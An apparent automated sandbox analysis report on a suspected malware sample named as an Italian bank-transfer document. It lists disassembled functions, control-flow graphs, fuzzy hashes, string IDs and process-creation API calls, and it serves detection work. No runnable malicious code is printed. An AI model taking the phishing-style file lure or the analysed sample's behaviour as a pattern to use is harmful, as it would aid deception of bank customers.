                                  • Instruction Fuzzy Hash: DCA1F674E05318DFEB58CFA5D99479EBBB2FB89310F1080AAD509AB354DB309A81CF54
                                  Function 06C04D5F Relevance: 3.9, Strings: 3, Instructions: 187COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 761 6c04d5f-6c04d74 763 6c04d77 761->763 764 6c04d7e-6c04d9a 763->764 765 6c04dac-6c04dad 764->765 766 6c04d9c 764->766 767 6c050b2-6c050b9 765->767 768 6c04db2 765->768 766->763 766->767 766->768 769 6c04eb1-6c04ec4 766->769 770 6c04e13-6c04e7b call 6c078a8 766->770 771 6c04ee8-6c04f3d call 6c078a8 766->771 772 6c04ec9 766->772 773 6c04f9a-6c05002 766->773 774 6c04dfb-6c04e0e 766->774 775 6c0504c-6c05086 call 6c087f8 call 6c0a088 call 6c0ac50 766->775 776 6c04dde 766->776 809 6c04db5 call 6c057d0 768->809 810 6c04db5 call 6c05778 768->810 769->764 802 6c04e81-6c04eac 770->802 794 6c04f43-6c04f50 771->794 818 6c04ecb call 73b7af8 772->818 819 6c04ecb call 73b7ae8 772->819 795 6c05004-6c05010 773->795 796 6c0502c 773->796 774->764 788 6c0508c-6c050ad 775->788 815 6c04de1 call 6c0ba00 776->815 816 6c04de1 call 6c0b8c8 776->816 778 6c04de7-6c04df9 778->764 779 6c04ed1-6c04ee3 783 6c04dbb-6c04ddc 783->764 797 6c04f52-6c04f5e 794->797 798 6c04f7a 794->798 800 6c05012-6c05018 795->800 801 6c0501a-6c05020 795->801 799 6c05032-6c05047 796->799 803 6c04f60-6c04f66 797->803 804 6c04f68-6c04f6e 797->804 805 6c04f80-6c04f95 798->805 799->764 806 6c0502a 800->806 801->806 802->764 807 6c04f78 803->807 804->807 805->764 806->799 807->805 809->783 810->783 815->778 816->778 818->779 819->779
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 'T$$p$$p
                                  • API String ID: 0-1373997259
                                  • Opcode ID: da95df3e6b336fe2f8966929f714bbc906ca201101f07840a844a5800f22a3ad
                                  • Instruction ID: edd2bba5cc47def07218763d9974022aef2ec70cbce8fcd7107ece4811a749cd
                                  • Opcode Fuzzy Hash: da95df3e6b336fe2f8966929f714bbc906ca201101f07840a844a5800f22a3ad
                                  • Instruction Fuzzy Hash: 3C91E574E05218CFEB58CFA5D994B9DBBB2FF89310F1081AAD509AB354DB309A81CF50
                                  Function 06C09ADA Relevance: .3, Instructions: 268COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0135c334c54ce4a6383b64ca3f65b0a53eb3c7b6e694e5530b4aceaa8bb2ed30
                                  • Instruction ID: 02bff739083535d90edcd5eca84a7e2288d43c5efcf55eadc3042c65e0135cf7
                                  • Opcode Fuzzy Hash: 0135c334c54ce4a6383b64ca3f65b0a53eb3c7b6e694e5530b4aceaa8bb2ed30
                                  • Instruction Fuzzy Hash: 7AD10831D2075A8ACB10EBA4D954BA9B7B1FF95300F10D79AD5493B224FB70AAC5CF90
                                  Function 06C09AE8 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 68b372ec98a6dab5d0aad0572b86716a6f909f1b33f22cc449908b85f190a0c7
                                  • Instruction ID: 1a4eca51e56fde631d6aca5397ecc242dde648cb96cf82b1f5b7bc6609c7fa97
                                  • Opcode Fuzzy Hash: 68b372ec98a6dab5d0aad0572b86716a6f909f1b33f22cc449908b85f190a0c7
                                  • Instruction Fuzzy Hash: 1AD1E731D2065A8ACB04EBA4D954BA9B7B1FF95300F20D79AD5493B224FB70AAC5CF50
                                  Function 06C0AC50 Relevance: .3, Instructions: 257COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: df2383afc1717f1cb52ba74eef17e1214474bf7ae14619ae4032f670baef6b18
                                  • Instruction ID: 617a23ce1789ca788cf3f083d8f0d9974b7e82c4b85fa6514b1725786c1dcad9
                                  • Opcode Fuzzy Hash: df2383afc1717f1cb52ba74eef17e1214474bf7ae14619ae4032f670baef6b18
                                  • Instruction Fuzzy Hash: C3B11671D09219DFEF58CFE6D98059EFBB2BF89300F10952AD415AB2A5EB349906CF40
                                  Function 06C0A088 Relevance: .2, Instructions: 233COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 54b28a9bf93db31122f51c6060c5797bcad48f8ee6a836ca7f3bc260bbe1959e
                                  • Instruction ID: 01947d62ecc2e6afc0e5e613da3e123edaf5e6aa67fed19990379a1832518483
                                  • Opcode Fuzzy Hash: 54b28a9bf93db31122f51c6060c5797bcad48f8ee6a836ca7f3bc260bbe1959e
                                  • Instruction Fuzzy Hash: 33A12371D05219DFEB58CFEAD8818DEFBB2FF89310F20952AD405AB2A5D7309942CB40
                                  Function 06C0F140 Relevance: .1, Instructions: 144COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77909c4099417df6a6c5e1994f1300ae4d40df68187b9a5c049796f11f3d97d7
                                  • Instruction ID: a90d65fb271403751f5abb88f19309dfe94c420f34219d278231595ad49f2105
                                  • Opcode Fuzzy Hash: 77909c4099417df6a6c5e1994f1300ae4d40df68187b9a5c049796f11f3d97d7
                                  • Instruction Fuzzy Hash: 0E5120B4D09218DFEB64CF97C5446EDBBBAAB89300F00D06ED929A7291D7345585CF90
                                  Function 06C078F8 Relevance: 7.7, Strings: 6, Instructions: 203COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 294 6c078f8-6c07928 295 6c0794a-6c0794f 294->295 296 6c0792a-6c0792d 294->296 295->296 297 6c07936-6c07948 296->297 298 6c0792f 296->298 297->296 298->295 298->297 299 6c07b20-6c07b24 298->299 300 6c079e0-6c079ea 298->300 301 6c07b41-6c07b67 298->301 302 6c07ac1-6c07ac6 298->302 303 6c079c2-6c079c9 298->303 304 6c07aa6-6c07aad 298->304 305 6c07966-6c0796b 298->305 306 6c07a87-6c07a91 298->306 307 6c07acb-6c07acd 298->307 308 6c0796d-6c07970 298->308 309 6c07951 298->309 310 6c07a15-6c07a1a 298->310 311 6c07996-6c07998 298->311 312 6c07a57-6c07a5b 298->312 313 6c07b37-6c07b3c 298->313 314 6c07b9c-6c07ba5 298->314 315 6c07a1f-6c07a35 298->315 324 6c07b30-6c07b35 299->324 325 6c07b26 299->325 317 6c07bb9-6c07bc5 300->317 327 6c079f0-6c07a01 300->327 367 6c07b69 301->367 368 6c07b6c-6c07b76 301->368 302->296 303->317 326 6c079cf-6c079db 303->326 316 6c07ab3-6c07abc 304->316 304->317 305->296 306->317 332 6c07a97-6c07aa1 306->332 318 6c07aeb 307->318 319 6c07acf-6c07ad5 307->319 320 6c07bb4 308->320 321 6c07976-6c07980 308->321 333 6c07954-6c07956 309->333 310->296 322 6c079b6 311->322 323 6c0799a-6c079a0 311->323 328 6c07a7c 312->328 329 6c07a5d-6c07a66 312->329 313->296 314->320 330 6c07ba7-6c07baf 314->330 315->333 357 6c07a3b-6c07a45 315->357 316->296 360 6c07b87-6c07b91 317->360 361 6c07bc7 317->361 348 6c07aed-6c07b0c 318->348 337 6c07ad7-6c07ad9 319->337 338 6c07adb-6c07ae7 319->338 320->317 321->317 339 6c07986-6c0798f 321->339 349 6c079b8-6c079bc call 6c07d60 322->349 340 6c079a2-6c079a4 323->340 341 6c079a6-6c079b2 323->341 324->313 336 6c07b2b 324->336 325->336 326->296 327->317 344 6c07a07-6c07a10 327->344 342 6c07a7f-6c07a86 328->342 346 6c07a68-6c07a6b 329->346 347 6c07a6d-6c07a70 329->347 330->296 332->296 334 6c07958 333->334 335 6c0795f-6c07964 333->335 350 6c0795d 334->350 335->305 335->350 336->296 351 6c07ae9 337->351 338->351 352 6c07991 339->352 353 6c07994 339->353 354 6c079b4 340->354 341->354 344->296 355 6c07a7a 346->355 347->355 348->317 365 6c07b12-6c07b1b 348->365 349->303 350->296 351->348 352->353 353->296 354->349 355->342 357->317 362 6c07a4b-6c07a52 357->362 360->317 366 6c07b93-6c07b97 360->366 362->296 365->296 366->296 367->368 369 6c07b78-6c07b7a 368->369 370 6c07b7c 368->370 371 6c07b7f-6c07b91 369->371 370->371 371->317 371->366
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRp$LRp$LRp$LRp$$p$$p
                                  • API String ID: 0-939497509
                                  • Opcode ID: 8c3048ba51460cd8a669f3bc80daae3521e3a50a2de0a934ec0bd1dc3a9d72d4
                                  • Instruction ID: 40db0fb8519660c401f941e58bdb7afb7c689cf27461e07a8f198cbc0630245a
                                  • Opcode Fuzzy Hash: 8c3048ba51460cd8a669f3bc80daae3521e3a50a2de0a934ec0bd1dc3a9d72d4
                                  • Instruction Fuzzy Hash: FF71D032E04115CFFB989B5AC850BBDBBF2EB44310F1480AAD555AB2D1E774EA41CBB1
                                  Function 06C04862 Relevance: 6.3, Strings: 5, Instructions: 57COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 495 6c04862-6c0486f 496 6c04870-6c048b1 495->496 498 6c048b3-6c04907 496->498 500 6c08a58-6c08a66 call 6c0490c 498->500
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: lk^$lk^$lk^$lk^$lk^
                                  • API String ID: 0-3594332490
                                  • Opcode ID: bbee4e1e8a26e03f64a26e1e7898b11c02e0369ac1bc54bd0bc954c6cdf220dc
                                  • Instruction ID: c6e5672fad3ee6c8618549216ca439472b3f03f3a8279940742a1a4c7cc43ec3
                                  • Opcode Fuzzy Hash: bbee4e1e8a26e03f64a26e1e7898b11c02e0369ac1bc54bd0bc954c6cdf220dc
                                  • Instruction Fuzzy Hash: 1911A7A39093C94FF3255A195C9439D7F96AF35381F05405385E08B1E3F626581EC747
                                  Function 06C078E9 Relevance: 3.9, Strings: 3, Instructions: 183COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 820 6c078e9-6c07928 821 6c0794a-6c0794f 820->821 822 6c0792a-6c0792d 821->822 823 6c07936-6c07948 822->823 824 6c0792f 822->824 823->822 824->821 824->823 825 6c07b20-6c07b24 824->825 826 6c079e0-6c079ea 824->826 827 6c07b41-6c07b67 824->827 828 6c07ac1-6c07ac6 824->828 829 6c079c2-6c079c9 824->829 830 6c07aa6-6c07aad 824->830 831 6c07966-6c0796b 824->831 832 6c07a87-6c07a91 824->832 833 6c07acb-6c07acd 824->833 834 6c0796d-6c07970 824->834 835 6c07951 824->835 836 6c07a15-6c07a1a 824->836 837 6c07996-6c07998 824->837 838 6c07a57-6c07a5b 824->838 839 6c07b37-6c07b3c 824->839 840 6c07b9c-6c07ba5 824->840 841 6c07a1f-6c07a35 824->841 850 6c07b30-6c07b35 825->850 851 6c07b26 825->851 843 6c07bb9-6c07bc5 826->843 853 6c079f0-6c07a01 826->853 893 6c07b69 827->893 894 6c07b6c-6c07b76 827->894 828->822 829->843 852 6c079cf-6c079db 829->852 842 6c07ab3-6c07abc 830->842 830->843 831->822 832->843 858 6c07a97-6c07aa1 832->858 844 6c07aeb 833->844 845 6c07acf-6c07ad5 833->845 846 6c07bb4 834->846 847 6c07976-6c07980 834->847 859 6c07954-6c07956 835->859 836->822 848 6c079b6 837->848 849 6c0799a-6c079a0 837->849 854 6c07a7c 838->854 855 6c07a5d-6c07a66 838->855 839->822 840->846 856 6c07ba7-6c07baf 840->856 841->859 883 6c07a3b-6c07a45 841->883 842->822 886 6c07b87-6c07b91 843->886 887 6c07bc7 843->887 874 6c07aed-6c07b0c 844->874 863 6c07ad7-6c07ad9 845->863 864 6c07adb-6c07ae7 845->864 846->843 847->843 865 6c07986-6c0798f 847->865 875 6c079b8-6c079bc call 6c07d60 848->875 866 6c079a2-6c079a4 849->866 867 6c079a6-6c079b2 849->867 850->839 862 6c07b2b 850->862 851->862 852->822 853->843 870 6c07a07-6c07a10 853->870 868 6c07a7f-6c07a86 854->868 872 6c07a68-6c07a6b 855->872 873 6c07a6d-6c07a70 855->873 856->822 858->822 860 6c07958 859->860 861 6c0795f-6c07964 859->861 876 6c0795d 860->876 861->831 861->876 862->822 877 6c07ae9 863->877 864->877 878 6c07991 865->878 879 6c07994 865->879 880 6c079b4 866->880 867->880 870->822 881 6c07a7a 872->881 873->881 874->843 891 6c07b12-6c07b1b 874->891 875->829 876->822 877->874 878->879 879->822 880->875 881->868 883->843 888 6c07a4b-6c07a52 883->888 886->843 892 6c07b93-6c07b97 886->892 888->822 891->822 892->822 893->894 895 6c07b78-6c07b7a 894->895 896 6c07b7c 894->896 897 6c07b7f-6c07b91 895->897 896->897 897->843 897->892
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: LRp$LRp$$p
                                  • API String ID: 0-2783056526
                                  • Opcode ID: a89187f89735b1c49250ffb5710bd1c2d951bc8711cc86673aa28f4121cd4d1a
                                  • Instruction ID: ddf20f83435acebd99c47abcab5fc68663a74111a0d793ba6567dcaaaac1d807
                                  • Opcode Fuzzy Hash: a89187f89735b1c49250ffb5710bd1c2d951bc8711cc86673aa28f4121cd4d1a
                                  • Instruction Fuzzy Hash: B761C032E04115CFFB989B5AC850BBD7BB1EB44311F0881AAD555AB2D2E374EA41CBB1
                                  Function 06C0E2D8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 938 6c0e2d8-6c0e2fb 939 6c0e302-6c0e3d5 call 6c0e2a8 938->939 940 6c0e2fd 938->940 949 6c0e3a7-6c0e3a8 939->949 950 6c0e34a-6c0e34f 939->950 940->939 949->950 952 6c0e351-6c0e352 950->952 953 6c0e354-6c0e457 call 6c0ea80 950->953 952->953 960 6c0e42c-6c0e432 953->960 962 6c0e3aa-6c0e3ae 960->962 963 6c0e3b0-6c0e4cc 962->963 964 6c0e415-6c0e42a 962->964 975 6c0e4ce call 6c0f140 963->975 976 6c0e4ce call 6c0f1d1 963->976 977 6c0e4ce call 6c0f542 963->977 978 6c0e4ce call 6c0f2a2 963->978 979 6c0e4ce call 6c0f203 963->979 980 6c0e4ce call 6c0f224 963->980 981 6c0e4ce call 6c0f577 963->981 982 6c0e4ce call 6c0f507 963->982 983 6c0e4ce call 6c0f327 963->983 984 6c0e4ce call 6c0f9db 963->984 985 6c0e4ce call 6c0f47c 963->985 986 6c0e4ce call 6c0f2df 963->986 964->960 968 6c0e3eb-6c0e4e3 964->968 968->962 974 6c0e4d4-6c0e4de 975->974 976->974 977->974 978->974 979->974 980->974 981->974 982->974 983->974 984->974 985->974 986->974
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep$Tep
                                  • API String ID: 0-347264811
                                  • Opcode ID: d8064203ddf4b7e1500a9cb1104269cf0aeef3a20afc4cec84f2bac5af5596d0
                                  • Instruction ID: 447212fda34f4727f7a1cfda09d2459b3758c6db92b74e5f70146fe9e16e03ab
                                  • Opcode Fuzzy Hash: d8064203ddf4b7e1500a9cb1104269cf0aeef3a20afc4cec84f2bac5af5596d0
                                  • Instruction Fuzzy Hash: 3671B4B4E052188FEB44CFEAC494AAEFBB6AF8D300F14942AD519AB3A5D7305945CB50
                                  Function 06C0E270 Relevance: 2.7, Strings: 2, Instructions: 177COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 988 6c0e270-6c0e278 989 6c0e2d1-6c0e2fb 988->989 990 6c0e27a-6c0e28a 988->990 994 6c0e302-6c0e3d5 call 6c0e2a8 989->994 995 6c0e2fd 989->995 991 6c0e291-6c0e297 990->991 992 6c0e28c 990->992 992->991 1004 6c0e3a7-6c0e3a8 994->1004 1005 6c0e34a-6c0e34f 994->1005 995->994 1004->1005 1007 6c0e351-6c0e352 1005->1007 1008 6c0e354-6c0e457 call 6c0ea80 1005->1008 1007->1008 1015 6c0e42c-6c0e432 1008->1015 1017 6c0e3aa-6c0e3ae 1015->1017 1018 6c0e3b0-6c0e4cc 1017->1018 1019 6c0e415-6c0e42a 1017->1019 1031 6c0e4ce call 6c0f140 1018->1031 1032 6c0e4ce call 6c0f1d1 1018->1032 1033 6c0e4ce call 6c0f542 1018->1033 1034 6c0e4ce call 6c0f2a2 1018->1034 1035 6c0e4ce call 6c0f203 1018->1035 1036 6c0e4ce call 6c0f224 1018->1036 1037 6c0e4ce call 6c0f577 1018->1037 1038 6c0e4ce call 6c0f507 1018->1038 1039 6c0e4ce call 6c0f327 1018->1039 1040 6c0e4ce call 6c0f9db 1018->1040 1041 6c0e4ce call 6c0f47c 1018->1041 1042 6c0e4ce call 6c0f2df 1018->1042 1019->1015 1023 6c0e3eb-6c0e4e3 1019->1023 1023->1017 1029 6c0e4d4-6c0e4de 1031->1029 1032->1029 1033->1029 1034->1029 1035->1029 1036->1029 1037->1029 1038->1029 1039->1029 1040->1029 1041->1029 1042->1029
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep$Tep
                                  • API String ID: 0-347264811
                                  • Opcode ID: 80040ddf109e123c9fb48ddff46c34dee0d71f92e2264cc4baef78f112f5c583
                                  • Instruction ID: 1bda78a16455b811b7a644fb767fb04a141a9e22f073dcec1b502d71a391777a
                                  • Opcode Fuzzy Hash: 80040ddf109e123c9fb48ddff46c34dee0d71f92e2264cc4baef78f112f5c583
                                  • Instruction Fuzzy Hash: 1D61F7B4E05208DFEB44CFEAC944AEEBBB6AF8D300F14842AD519AB395D7305945CB90
                                  Function 06C0E2C9 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1043 6c0e2c9-6c0e2fb 1046 6c0e302-6c0e3d5 call 6c0e2a8 1043->1046 1047 6c0e2fd 1043->1047 1056 6c0e3a7-6c0e3a8 1046->1056 1057 6c0e34a-6c0e34f 1046->1057 1047->1046 1056->1057 1059 6c0e351-6c0e352 1057->1059 1060 6c0e354-6c0e457 call 6c0ea80 1057->1060 1059->1060 1067 6c0e42c-6c0e432 1060->1067 1069 6c0e3aa-6c0e3ae 1067->1069 1070 6c0e3b0-6c0e4cc 1069->1070 1071 6c0e415-6c0e42a 1069->1071 1083 6c0e4ce call 6c0f140 1070->1083 1084 6c0e4ce call 6c0f1d1 1070->1084 1085 6c0e4ce call 6c0f542 1070->1085 1086 6c0e4ce call 6c0f2a2 1070->1086 1087 6c0e4ce call 6c0f203 1070->1087 1088 6c0e4ce call 6c0f224 1070->1088 1089 6c0e4ce call 6c0f577 1070->1089 1090 6c0e4ce call 6c0f507 1070->1090 1091 6c0e4ce call 6c0f327 1070->1091 1092 6c0e4ce call 6c0f9db 1070->1092 1093 6c0e4ce call 6c0f47c 1070->1093 1094 6c0e4ce call 6c0f2df 1070->1094 1071->1067 1075 6c0e3eb-6c0e4e3 1071->1075 1075->1069 1081 6c0e4d4-6c0e4de 1083->1081 1084->1081 1085->1081 1086->1081 1087->1081 1088->1081 1089->1081 1090->1081 1091->1081 1092->1081 1093->1081 1094->1081
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1366632486.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6c00000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Tep$Tep
                                  • API String ID: 0-347264811
                                  • Opcode ID: ab4569dd6fbd35a87e1e894a793878bd1cc957f8c8ef4004702c02f090f9a60e
                                  • Instruction ID: 8ec5c5f7ced287276bd2f71a11b16824226d0c50392c4cdc696c6e9dba4d1dbe
                                  • Opcode Fuzzy Hash: ab4569dd6fbd35a87e1e894a793878bd1cc957f8c8ef4004702c02f090f9a60e
                                  • Instruction Fuzzy Hash: 9551F7B4E052088FEB44CFEAC844AEEFBF6AF8D300F14842AD519AB395D7305945CB50
                                  Function 073B500C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1095 73b500c-73b50ad 1098 73b50af-73b50b9 1095->1098 1099 73b50e6-73b5106 1095->1099 1098->1099 1100 73b50bb-73b50bd 1098->1100 1106 73b5108-73b5112 1099->1106 1107 73b513f-73b516e 1099->1107 1101 73b50bf-73b50c9 1100->1101 1102 73b50e0-73b50e3 1100->1102 1104 73b50cb 1101->1104 1105 73b50cd-73b50dc 1101->1105 1102->1099 1104->1105 1105->1105 1108 73b50de 1105->1108 1106->1107 1109 73b5114-73b5116 1106->1109 1113 73b5170-73b517a 1107->1113 1114 73b51a7-73b5261 CreateProcessA 1107->1114 1108->1102 1111 73b5139-73b513c 1109->1111 1112 73b5118-73b5122 1109->1112 1111->1107 1115 73b5126-73b5135 1112->1115 1116 73b5124 1112->1116 1113->1114 1118 73b517c-73b517e 1113->1118 1127 73b526a-73b52f0 1114->1127 1128 73b5263-73b5269 1114->1128 1115->1115 1117 73b5137 1115->1117 1116->1115 1117->1111 1119 73b51a1-73b51a4 1118->1119 1120 73b5180-73b518a 1118->1120 1119->1114 1122 73b518e-73b519d 1120->1122 1123 73b518c 1120->1123 1122->1122 1125 73b519f 1122->1125 1123->1122 1125->1119 1138 73b52f2-73b52f6 1127->1138 1139 73b5300-73b5304 1127->1139 1128->1127 1138->1139 1140 73b52f8 1138->1140 1141 73b5306-73b530a 1139->1141 1142 73b5314-73b5318 1139->1142 1140->1139 1141->1142 1143 73b530c 1141->1143 1144 73b531a-73b531e 1142->1144 1145 73b5328-73b532c 1142->1145 1143->1142 1144->1145 1146 73b5320 1144->1146 1147 73b533e-73b5345 1145->1147 1148 73b532e-73b5334 1145->1148 1146->1145 1149 73b535c 1147->1149 1150 73b5347-73b5356 1147->1150 1148->1147 1152 73b535d 1149->1152 1150->1149 1152->1152
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B524E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: f12a8855f6702a0896ae2ce1d488e33152d82b52af972ed59ce991031c1d1ed3
                                  • Instruction ID: d6d84a580ae2d6247c4f472e959876b389de800263fb6f11601a6c00cb8f4ae5
                                  • Opcode Fuzzy Hash: f12a8855f6702a0896ae2ce1d488e33152d82b52af972ed59ce991031c1d1ed3
                                  • Instruction Fuzzy Hash: FBA17BB1D00219DFEF20CF68C841BEDBBB2FB48314F14856AE919A7240DB759995CF91
                                  Function 073B5018 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073B524E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1367688341.00000000073B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_73b0000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: CreateProcess
                                  • String ID:
                                  • API String ID: 963392458-0
                                  • Opcode ID: f8df8bf60fb411872cbc3141a4f7b41a9e22911e4a03181440de02638e924c62
                                  • Instruction ID: fbb47cfceed3232bb883abbc60186db6c2a2fa372cc1e3bdf41919d5f60645dc
                                  • Opcode Fuzzy Hash: f8df8bf60fb411872cbc3141a4f7b41a9e22911e4a03181440de02638e924c62
                                  • Instruction Fuzzy Hash: A0916AB1D00219CFEF20CF68C840BEDBBB2BF48314F14856AE919A7240DB759995CF91
                                  Function 00C95D0C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00C95DC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 6e2ed88739297aed5f1b12d92ec3c54f280cb338eefa90336f7dfd2a09594f03
                                  • Instruction ID: 506cd1c6e2aff7aaee7eae34c446761efc1e257ac424d7a8f538ea165ec737ca
                                  • Opcode Fuzzy Hash: 6e2ed88739297aed5f1b12d92ec3c54f280cb338eefa90336f7dfd2a09594f03
                                  • Instruction Fuzzy Hash: 5641F571C00719CBDB24CFA9C8487CEBBB5BF49308F20806AD518AB255DB75A94ACF50
                                  Function 00C94248 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateActCtxA.KERNEL32(?), ref: 00C95DC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1359981875.0000000000C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_c90000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: Create
                                  • String ID:
                                  • API String ID: 2289755597-0
                                  • Opcode ID: 46ee2044f99cedfca2c8103fa8f41fe6deb02e91ec741c782269aa57a81330f4
                                  • Instruction ID: 4e0217433912e44d8c954e0f9f6d234792ec7b02754d901e4d5323f425e9f20e
